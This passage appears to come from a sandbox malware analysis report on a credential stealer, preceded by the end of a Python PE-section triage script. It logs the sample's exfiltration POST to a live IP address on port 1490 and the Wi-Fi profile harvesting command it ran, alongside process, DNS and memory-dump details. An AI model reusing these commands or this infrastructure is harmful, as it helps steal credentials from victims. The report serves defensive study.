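    linked = datetime.fromtimestamp(ts, timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")
    return {"timestamp": linked, "entry_rva": entry_rva, "sections": sections}


def triage(pe):
    """Map section name -> findings: odd names, W+X rights, packed bodies, entrypoint owner."""
    findings = {}
    for s in pe["sections"]:
        flags = []
        if not NORMAL_NAME.match(s["name"].encode("latin-1")):
            flags.append("unusual-name")
        if s["chars"] & IMAGE_SCN_MEM_EXECUTE and s["chars"] & IMAGE_SCN_MEM_WRITE:
            flags.append("writable+executable")
        if s["entropy"] > HIGH_ENTROPY:
            flags.append("high-entropy")
        if s["va"] <= pe["entry_rva"] < s["va"] + max(s["vsize"], s["rawsize"]):
            flags.append("entrypoint")
        findings[s["name"]] = flags
    return findings


CODE = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ
DATA = IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ
# Mirrors the first four rows of the section table; bytes(range(256)) * 4 is constructed
# filler (entropy 8.0) standing in for the packed section body, which is not on this page.
SAMPLE_SECTIONS = [
    (b".text", 0x2000,   0xeff72,  CODE, b""),
    (b".\\C3", 0xf2000,  0x18465f, CODE, bytes(range(256)) * 4),
    (b'."@W',  0x278000, 0x7bb70,  CODE, b""),
    (b".rsrc", 0x2f4000, 0x596,    DATA, b""),
]
# Entrypoint 0x4f1ee6 minus image base 0x400000; link timestamp as reported above.
SAMPLE_PE = build_pe32(SAMPLE_SECTIONS, entry_rva=0x4f1ee6 - 0x400000, timestamp=0x6762DFC3)


def triage_sample():
    return triage(parse_pe32(SAMPLE_PE))


if __name__ == "__main__":
    info = parse_pe32(SAMPLE_PE)
    print("linked:", info["timestamp"], "entry RVA: %#x" % info["entry_rva"])
    for name, flags in triage(info).items():
        print("%-6s %s" % (name, ", ".join(flags) or "-"))
```

On a real file, read it fully and pass the bytes to `parse_pe32`; the entropy then comes from the actual section contents, and a `.text` that carries the entrypoint but sits above 7 bits per byte together with extra executable sections with unprintable names is the pattern this table shows.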
Name         RVA       Size   Type                                                                              Language  Country  ZLIB Complexity
RT_VERSION   0x2f4090  0x30c  data                                                                                                  0.4282051282051282
RT_MANIFEST  0x2f43ac  0x1ea  XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators                     0.5489795918367347
DLL          Import
mscoree.dll  _CorExeMain
Timestamp                        SID      Signature                                                                            Severity  Source IP      Source Port  Dest IP        Dest Port  Protocol
2024-12-19T08:26:14.011328+0100  2843856  ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screenshot.) M2  1         192.168.11.20  49718        89.23.100.233  1490       TCP
Timestamp                            Source Port  Dest Port  Source IP       Dest IP
Dec 19, 2024 08:26:06.445286989 CET  49717        80         192.168.11.20   104.16.184.241
Dec 19, 2024 08:26:06.580420017 CET  80           49717      104.16.184.241  192.168.11.20
Dec 19, 2024 08:26:06.581130981 CET  49717        80         192.168.11.20   104.16.184.241
Dec 19, 2024 08:26:06.581495047 CET  49717        80         192.168.11.20   104.16.184.241
Dec 19, 2024 08:26:06.716522932 CET  80           49717      104.16.184.241  192.168.11.20
Dec 19, 2024 08:26:06.724498034 CET  80           49717      104.16.184.241  192.168.11.20
Dec 19, 2024 08:26:06.767455101 CET  49717        80         192.168.11.20   104.16.184.241
Dec 19, 2024 08:26:12.728980064 CET  49718        1490       192.168.11.20   89.23.100.233
Dec 19, 2024 08:26:13.006740093 CET  1490         49718      89.23.100.233   192.168.11.20
Dec 19, 2024 08:26:13.007004023 CET  49718        1490       192.168.11.20   89.23.100.233
Dec 19, 2024 08:26:13.007729053 CET  49718        1490       192.168.11.20   89.23.100.233
Dec 19, 2024 08:26:13.008251905 CET  49717        80         192.168.11.20   104.16.184.241
Dec 19, 2024 08:26:13.143769026 CET  80           49717      104.16.184.241  192.168.11.20
Dec 19, 2024 08:26:13.143893957 CET  49717        80         192.168.11.20   104.16.184.241
Dec 19, 2024 08:26:13.297394037 CET  1490         49718      89.23.100.233   192.168.11.20
Dec 19, 2024 08:26:13.299988985 CET  49718        1490       192.168.11.20   89.23.100.233
Dec 19, 2024 08:26:13.300641060 CET  49718        1490       192.168.11.20   89.23.100.233
Dec 19, 2024 08:26:13.300703049 CET  49718        1490       192.168.11.20   89.23.100.233
Dec 19, 2024 08:26:13.300715923 CET  49718        1490       192.168.11.20   89.23.100.233
Dec 19, 2024 08:26:13.577130079 CET  1490         49718      89.23.100.233   192.168.11.20
Dec 19, 2024 08:26:13.577871084 CET  1490         49718      89.23.100.233   192.168.11.20
Dec 19, 2024 08:26:13.578089952 CET  49718        1490       192.168.11.20   89.23.100.233
Dec 19, 2024 08:26:13.578293085 CET  49718        1490       192.168.11.20   89.23.100.233
Dec 19, 2024 08:26:13.586378098 CET  1490         49718      89.23.100.233   192.168.11.20
Dec 19, 2024 08:26:13.586579084 CET  49718        1490       192.168.11.20   89.23.100.233
Dec 19, 2024 08:26:13.596863985 CET  1490         49718      89.23.100.233   192.168.11.20
Dec 19, 2024 08:26:13.597089052 CET  49718        1490       192.168.11.20   89.23.100.233
Dec 19, 2024 08:26:13.608768940 CET  1490         49718      89.23.100.233   192.168.11.20
Dec 19, 2024 08:26:13.608942032 CET  49718        1490       192.168.11.20   89.23.100.233
Dec 19, 2024 08:26:13.620646954 CET  1490         49718      89.23.100.233   192.168.11.20
Dec 19, 2024 08:26:13.620863914 CET  49718        1490       192.168.11.20   89.23.100.233
Dec 19, 2024 08:26:13.632344961 CET  1490         49718      89.23.100.233   192.168.11.20
Dec 19, 2024 08:26:13.632627010 CET  49718        1490       192.168.11.20   89.23.100.233
Dec 19, 2024 08:26:13.642873049 CET  1490         49718      89.23.100.233   192.168.11.20
Dec 19, 2024 08:26:13.643040895 CET  49718        1490       192.168.11.20   89.23.100.233
Dec 19, 2024 08:26:13.654126883 CET  1490         49718      89.23.100.233   192.168.11.20
Dec 19, 2024 08:26:13.654298067 CET  49718        1490       192.168.11.20   89.23.100.233
Dec 19, 2024 08:26:13.654444933 CET  49718        1490       192.168.11.20   89.23.100.233
Dec 19, 2024 08:26:13.855703115 CET  1490         49718      89.23.100.233   192.168.11.20
Dec 19, 2024 08:26:13.855884075 CET  49718        1490       192.168.11.20   89.23.100.233
Dec 19, 2024 08:26:13.856054068 CET  49718        1490       192.168.11.20   89.23.100.233
Dec 19, 2024 08:26:13.874448061 CET  1490         49718      89.23.100.233   192.168.11.20
Dec 19, 2024 08:26:13.874665976 CET  49718        1490       192.168.11.20   89.23.100.233
Dec 19, 2024 08:26:13.874838114 CET  49718        1490       192.168.11.20   89.23.100.233
Dec 19, 2024 08:26:13.895879030 CET  1490         49718      89.23.100.233   192.168.11.20
Dec 19, 2024 08:26:13.896064997 CET  49718        1490       192.168.11.20   89.23.100.233
Dec 19, 2024 08:26:13.896236897 CET  49718        1490       192.168.11.20   89.23.100.233
Dec 19, 2024 08:26:13.917874098 CET  1490         49718      89.23.100.233   192.168.11.20
Dec 19, 2024 08:26:13.918060064 CET  49718        1490       192.168.11.20   89.23.100.233
Dec 19, 2024 08:26:13.918205976 CET  49718        1490       192.168.11.20   89.23.100.233
Dec 19, 2024 08:26:13.929316044 CET  1490         49718      89.23.100.233   192.168.11.20
Dec 19, 2024 08:26:13.929516077 CET  49718        1490       192.168.11.20   89.23.100.233
Dec 19, 2024 08:26:13.929688931 CET  49718        1490       192.168.11.20   89.23.100.233
Dec 19, 2024 08:26:13.960870981 CET  1490         49718      89.23.100.233   192.168.11.20
Dec 19, 2024 08:26:13.961025953 CET  49718        1490       192.168.11.20   89.23.100.233
Dec 19, 2024 08:26:13.961199999 CET  49718        1490       192.168.11.20   89.23.100.233
Dec 19, 2024 08:26:13.971740961 CET  1490         49718      89.23.100.233   192.168.11.20
Dec 19, 2024 08:26:13.971884012 CET  49718        1490       192.168.11.20   89.23.100.233
Dec 19, 2024 08:26:13.972055912 CET  49718        1490       192.168.11.20   89.23.100.233
Dec 19, 2024 08:26:14.011118889 CET  1490         49718      89.23.100.233   192.168.11.20
Dec 19, 2024 08:26:14.011327982 CET  49718        1490       192.168.11.20   89.23.100.233
Dec 19, 2024 08:26:14.011485100 CET  49718        1490       192.168.11.20   89.23.100.233
Dec 19, 2024 08:26:14.033709049 CET  1490         49718      89.23.100.233   192.168.11.20
Dec 19, 2024 08:26:14.033879042 CET  49718        1490       192.168.11.20   89.23.100.233
Dec 19, 2024 08:26:14.034049034 CET  49718        1490       192.168.11.20   89.23.100.233
Dec 19, 2024 08:26:14.046325922 CET  1490         49718      89.23.100.233   192.168.11.20
Dec 19, 2024 08:26:14.046530962 CET  49718        1490       192.168.11.20   89.23.100.233
Dec 19, 2024 08:26:14.046704054 CET  49718        1490       192.168.11.20   89.23.100.233
Dec 19, 2024 08:26:14.133358002 CET  1490         49718      89.23.100.233   192.168.11.20
Dec 19, 2024 08:26:14.133524895 CET  49718        1490       192.168.11.20   89.23.100.233
Dec 19, 2024 08:26:14.133723974 CET  49718        1490       192.168.11.20   89.23.100.233
Dec 19, 2024 08:26:14.152265072 CET  1490         49718      89.23.100.233   192.168.11.20
Dec 19, 2024 08:26:14.152456999 CET  49718        1490       192.168.11.20   89.23.100.233
Dec 19, 2024 08:26:14.152628899 CET  49718        1490       192.168.11.20   89.23.100.233
Dec 19, 2024 08:26:14.176202059 CET  1490         49718      89.23.100.233   192.168.11.20
                                          Dec 19, 2024 08:26:14.176400900 CET497181490192.168.11.2089.23.100.233
                                          Dec 19, 2024 08:26:14.176574945 CET497181490192.168.11.2089.23.100.233
                                          Dec 19, 2024 08:26:14.198271990 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:14.198501110 CET497181490192.168.11.2089.23.100.233
                                          Dec 19, 2024 08:26:14.198662996 CET497181490192.168.11.2089.23.100.233
                                          Dec 19, 2024 08:26:14.213874102 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:14.214049101 CET497181490192.168.11.2089.23.100.233
                                          Dec 19, 2024 08:26:14.214193106 CET497181490192.168.11.2089.23.100.233
                                          Dec 19, 2024 08:26:14.231021881 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:14.231267929 CET497181490192.168.11.2089.23.100.233
                                          Dec 19, 2024 08:26:14.231431007 CET497181490192.168.11.2089.23.100.233
                                          Dec 19, 2024 08:26:14.252787113 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:14.252998114 CET497181490192.168.11.2089.23.100.233
                                          Dec 19, 2024 08:26:14.253170967 CET497181490192.168.11.2089.23.100.233
                                          Dec 19, 2024 08:26:14.274178982 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:14.274450064 CET497181490192.168.11.2089.23.100.233
                                          Dec 19, 2024 08:26:14.274621010 CET497181490192.168.11.2089.23.100.233
                                          Dec 19, 2024 08:26:14.307596922 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:14.307795048 CET497181490192.168.11.2089.23.100.233
                                          Dec 19, 2024 08:26:14.317996025 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:14.351059914 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:14.372878075 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:14.396605968 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:14.419784069 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:14.447063923 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:14.468689919 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:14.489753008 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:14.530695915 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:14.530703068 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:14.559106112 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:14.582916021 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:14.602096081 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:14.623694897 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:14.634187937 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:14.656965971 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:14.691504955 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:14.702482939 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:14.725681067 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:14.758034945 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:14.769021988 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:14.791444063 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:14.812571049 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:14.823008060 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:14.834028006 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:14.857206106 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:14.889153957 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:14.912594080 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:14.923090935 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:17.108047009 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:17.117377043 CET14904971889.23.100.233192.168.11.20
                                          Dec 19, 2024 08:26:17.117541075 CET497181490192.168.11.2089.23.100.233
                                          Dec 19, 2024 08:26:17.118180037 CET497181490192.168.11.2089.23.100.233
                                          Dec 19, 2024 08:26:17.395267963 CET14904971889.23.100.233192.168.11.20
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 19, 2024 08:26:06.289163113 CET | 51654 | 53 | 192.168.11.20 | 1.1.1.1
Dec 19, 2024 08:26:06.430794001 CET | 53 | 51654 | 1.1.1.1 | 192.168.11.20
Dec 19, 2024 08:26:06.748301983 CET | 65178 | 53 | 192.168.11.20 | 1.1.1.1
Dec 19, 2024 08:26:06.889626026 CET | 53 | 65178 | 1.1.1.1 | 192.168.11.20
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 19, 2024 08:26:06.289163113 CET | 192.168.11.20 | 1.1.1.1 | 0xee86 | Standard query (0) | icanhazip.com | A (IP address) | IN (0x0001) | false
Dec 19, 2024 08:26:06.748301983 CET | 192.168.11.20 | 1.1.1.1 | 0x99c5 | Standard query (0) | 245.246.1.0.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 19, 2024 08:26:06.430794001 CET | 1.1.1.1 | 192.168.11.20 | 0xee86 | No error (0) | icanhazip.com | | 104.16.184.241 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 08:26:06.430794001 CET | 1.1.1.1 | 192.168.11.20 | 0xee86 | No error (0) | icanhazip.com | | 104.16.185.241 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 08:26:06.889626026 CET | 1.1.1.1 | 192.168.11.20 | 0x99c5 | Name error (3) | 245.246.1.0.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
                                          • icanhazip.com
                                          • 89.23.100.233:1490
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.11.20 | 49717 | 104.16.184.241 | 80 | 8592 | C:\Users\user\Desktop\bPkG0wTVon.exe

Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 08:26:06.581495047 CET | 63 | OUT | GET / HTTP/1.1
Host: icanhazip.com
Connection: Keep-Alive
Dec 19, 2024 08:26:06.724498034 CET | 538 | IN | HTTP/1.1 200 OK
Date: Thu, 19 Dec 2024 07:26:06 GMT
Content-Type: text/plain
Content-Length: 16
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET
Set-Cookie: __cf_bm=Ih.kLeT7xJIJLONPo36324rSWQHO5fByIjotoIe5cJE-1734593166-1.0.1.1-I0ug7YQ7cA1RmPx594ejG93nbo78gqeNlLQ_ydLKd0J3ZuTfEwUH.VWwEnpkD7ckLP4gjOnnLvqSn0C9s5pHQQ; path=/; expires=Thu, 19-Dec-24 07:56:06 GMT; domain=.icanhazip.com; HttpOnly
Server: cloudflare
CF-RAY: 8f45a99b997832ec-JAX
alt-svc: h3=":443"; ma=86400
Data Raw: 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 30 35 0a
Data Ascii: 102.129.152.205


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.11.20 | 49718 | 89.23.100.233 | 1490 | 8592 | C:\Users\user\Desktop\bPkG0wTVon.exe

Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 08:26:13.007729053 CET | 205 | OUT | POST /upload HTTP/1.1
Content-Type: multipart/form-data; boundary="6d617208-f1f4-415c-8f95-dec90f8a5da2"
Host: 89.23.100.233:1490
Content-Length: 133579
Expect: 100-continue
Connection: Keep-Alive
Dec 19, 2024 08:26:13.297394037 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 19, 2024 08:26:13.577130079 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 19, 2024 08:26:17.108047009 CET | 165 | IN | HTTP/1.1 200 OK
Server: Werkzeug/3.1.3 Python/3.13.0
Date: Thu, 19 Dec 2024 07:26:16 GMT
Content-Type: application/json
Content-Length: 61
Connection: close



Target ID: 0
Start time: 02:26:03
Start date: 19/12/2024
Path: C:\Users\user\Desktop\bPkG0wTVon.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\bPkG0wTVon.exe"
Imagebase: 0x120000
File size: 3'084'288 bytes
MD5 hash: 36274AEFE69F86532CEE326B878F06FF
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1495190259.0000000002872000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Target ID: 8
Start time: 02:26:05
Start date: 19/12/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: "cmd.exe" /c tasklist
Imagebase: 0x140000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 9
Start time: 02:26:05
Start date: 19/12/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All
Imagebase: 0x7e0000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 10
Start time: 02:26:05
Start date: 19/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7fc440000
File size: 875'008 bytes
MD5 hash: 81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 11
Start time: 02:26:05
Start date: 19/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7fc440000
File size: 875'008 bytes
MD5 hash: 81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 12
Start time: 02:26:05
Start date: 19/12/2024
Path: C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit): true
Commandline: tasklist
Imagebase: 0x160000
File size: 79'360 bytes
MD5 hash: 0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 13
Start time: 02:26:05
Start date: 19/12/2024
Path: C:\Windows\SysWOW64\chcp.com
Wow64 process (32bit): true
Commandline: chcp 65001
Imagebase: 0xdf0000
File size: 12'800 bytes
MD5 hash: 41146159AA3D41A92B53ED311EE15693
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 14
Start time: 02:26:05
Start date: 19/12/2024
Path: C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit): true
Commandline: netsh wlan show profiles
Imagebase: 0x1220000
File size: 82'432 bytes
MD5 hash: 4E89A1A088BE715D6C946E55AB07C7DF
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 15
Start time: 02:26:05
Start date: 19/12/2024
Path: C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit): true
Commandline: findstr All
Imagebase: 0x270000
File size: 29'696 bytes
MD5 hash: F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 17
Start time: 02:26:21
Start date: 19/12/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp6122.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp6122.tmp.bat
Imagebase: 0x7e0000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 18
Start time: 02:26:21
Start date: 19/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7fc440000
File size: 875'008 bytes
MD5 hash: 81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 19
Start time: 02:26:21
Start date: 19/12/2024
Path: C:\Windows\SysWOW64\chcp.com
Wow64 process (32bit): true
Commandline: chcp 65001
Imagebase: 0xdf0000
File size: 12'800 bytes
MD5 hash: 41146159AA3D41A92B53ED311EE15693
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 20
Start time: 02:26:21
Start date: 19/12/2024
Path: C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit): true
Commandline: TaskKill /F /IM 8592
Imagebase: 0x420000
File size: 74'240 bytes
MD5 hash: CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 23
Start time: 02:26:21
Start date: 19/12/2024
Path: C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit): true
Commandline: Timeout /T 2 /Nobreak
Imagebase: 0x360000
File size: 25'088 bytes
MD5 hash: 976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 24
Start time: 02:26:21
Start date: 19/12/2024
Path: C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\WerFault.exe -u -p 8592 -s 3592
Imagebase: 0x860000
File size: 482'640 bytes
MD5 hash: 40A149513D721F096DDF50C04DA2F01F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true


Execution Graph

Execution Coverage: 27.7%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 53.5%
Total number of Nodes: 245
Total number of Limit Nodes: 16
54404 5dff873 2 API calls 54397->54404 54405 5dff880 2 API calls 54397->54405 54406 5dff870 2 API calls 54397->54406 54398 5dffb71 54398->54391 54399->54398 54400 5dffb0b 54399->54400 54401 825c070 2 API calls 54399->54401 54403 8259c68 2 API calls 54399->54403 54400->54398 54402 8259c68 2 API calls 54400->54402 54401->54399 54402->54398 54403->54399 54404->54399 54405->54399 54406->54399 54408 5dff89e 54407->54408 54409 5dffb71 54408->54409 54410 5dffb0b 54408->54410 54412 8259c68 2 API calls 54408->54412 54413 825c070 2 API calls 54408->54413 54409->54391 54410->54409 54411 8259c68 2 API calls 54410->54411 54411->54409 54412->54408 54413->54408 54416 5dff89b 54414->54416 54421 5dff873 2 API calls 54414->54421 54422 5dff880 2 API calls 54414->54422 54423 5dff870 2 API calls 54414->54423 54415 5dffb71 54415->54391 54416->54415 54417 5dffb0b 54416->54417 54418 825c070 2 API calls 54416->54418 54420 8259c68 2 API calls 54416->54420 54417->54415 54419 8259c68 2 API calls 54417->54419 54418->54416 54419->54415 54420->54416 54421->54416 54422->54416 54423->54416 54254 4d33e68 54255 4d33ea8 NtClose 54254->54255 54257 4d33ed9 54255->54257
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1509033258.0000000008250000.00000040.00000800.00020000.00000000.sdmp, Offset: 08250000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_8250000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: R5t$%W$T*6$ !?^$ CP$"Z"%$#'a$+~37$,b!l$.~#N$7*;^$TrB$VrB
                                            • API String ID: 0-1610231927
                                            • Opcode ID: 26bce7d05489258e14fb161809b38279d807ad615af4d78d9a1459c68bb3146b
                                            • Instruction ID: d4179e4ac918079f7a7b0c26a6f7b2b4751a52db2fe85d14e3452ded7412666b
                                            • Opcode Fuzzy Hash: 26bce7d05489258e14fb161809b38279d807ad615af4d78d9a1459c68bb3146b
                                            • Instruction Fuzzy Hash: 91B3DB74E006189FCB58DFA8C891A9EBBB2BF98315F1481E9D509E7354DB34AE91CF40

                                            Control-flow Graph
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1502501634.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d30000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: {a$ $!$$$$#?$%$C
                                            • API String ID: 0-657611279
                                            • Opcode ID: a98af289f9d9db145f5ddce9532b3405ce6fea16a29e3d636054884b1f3ce82a
                                            • Instruction ID: 351ec15fa15a6eaf22c6c72d9ded8c9f974a1b7bd6fae8f9fba76f1f3b6b2b95
                                            • Opcode Fuzzy Hash: a98af289f9d9db145f5ddce9532b3405ce6fea16a29e3d636054884b1f3ce82a
                                            • Instruction Fuzzy Hash: 15B2A371F001248FDB58DBA8C890B9EB7A7AF94305F1481AED50DE7384DE78AD458FA1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1509332868.0000000008310000.00000040.00000800.00020000.00000000.sdmp, Offset: 08310000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_8310000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: l67$!V)$%F8U$4?>$=[ +$>76
                                            • API String ID: 0-94386722
                                            • Opcode ID: 4f6ee01243e39e52868178929abc038594865e5f7f2fc5f546408883c8e29237
                                            • Instruction ID: 0a718d3568555677a6edf914b0d3bdafdccededb2e3cb954190b3edbb5561100
                                            • Opcode Fuzzy Hash: 4f6ee01243e39e52868178929abc038594865e5f7f2fc5f546408883c8e29237
                                            • Instruction Fuzzy Hash: FF334376E116398BDB29CF18C880699B7F6BB88704F1A85E9D809F7351D7349E85CF80
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1509230686.00000000082A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_82a0000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: -))P$. )V$3e&G$7f.X$8;.}
                                            • API String ID: 0-2941760644
                                            • Opcode ID: a1c2567afb6a931bab27941fc07634a3520558b0f136be0cd80d52104a37fec4
                                            • Instruction ID: 1ca2aa3b31dc82c54ac82ae32eb321313d2713a4ce12052900168b8a92d892ff
                                            • Opcode Fuzzy Hash: a1c2567afb6a931bab27941fc07634a3520558b0f136be0cd80d52104a37fec4
                                            • Instruction Fuzzy Hash: 46638176E112298FCB24CF58C980699F7F6AF88310F0A85E9D949EB351D7349E85CF84
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1509230686.00000000082A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_82a0000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $$^!u$'9 $*l1Y$ethods
                                            • API String ID: 0-2952273495
                                            • Opcode ID: cd57eef527dd179edf9a6ba1407ea7b8e2ae2bf343b4a1eba9908776b8a06285
                                            • Instruction ID: 56483817b878a8a9e912f2f7d993ba6b7eaa5b0dbd6c6af2cea9f727660829fe
                                            • Opcode Fuzzy Hash: cd57eef527dd179edf9a6ba1407ea7b8e2ae2bf343b4a1eba9908776b8a06285
